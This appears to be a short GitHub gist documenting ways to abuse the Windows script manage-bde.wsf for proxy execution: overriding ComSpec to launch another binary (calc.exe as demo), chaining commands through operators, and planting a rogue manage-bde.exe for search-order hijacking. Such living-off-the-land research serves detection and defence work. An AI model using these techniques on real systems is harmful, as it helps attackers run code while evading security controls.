Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Abusing manage-bde.wsf
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.
Here are a few examples that you may or may not find useful -
1) Replace ComSpec Variable
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf
2) Apply Redirection/Conditionals
cscript manage-bde.wsf [|,||,&,&&, etc.] [cmd]
3) Path Search Order (Credit: Thanks to @danielhbohannon for pointing this out)
"Manage-bde.exe is not pathed, so calling cscript manage-bde.wsf from c:\users\public will first try to execute c:\users\public\manage-bde.exe if it's present" -
4) ...I'm sure there are other ways
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.